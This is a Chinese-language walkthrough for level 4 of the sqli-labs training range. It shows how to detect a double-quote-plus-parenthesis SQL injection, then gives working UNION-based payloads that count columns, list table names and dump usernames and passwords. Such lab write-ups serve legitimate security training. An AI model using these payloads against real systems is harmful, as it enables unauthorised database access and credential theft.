sqli-labs靶场第四关——“)闭合
一:确定注入类型
输入?id=1,显示正常,单引号测试 ?id=1',单引号括号测试?id=1')均无问题
输入双引号测试:
?id=1"--+报错如下:
报错显示 " " ),说明为双引号字符型,并且括号没闭合
输入双引号括号
?id=1")--+我们可以发现页面恢复正常,说明第四关注入是双引号+括号型
二:开始注入攻击
1.确定列数
?id=1") order by 3--+数到4开始报错,所以有三列
2.找回显位
?id=-1") union select 1,2,3--+
3.获取数据库信息(数据库名称,mysql版本号)
4.获取所有表名
?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
5.爆出所有数据
?id=-1")%20union%20select%201,group_concat(username),group_concat(password)%20from%20users--+ 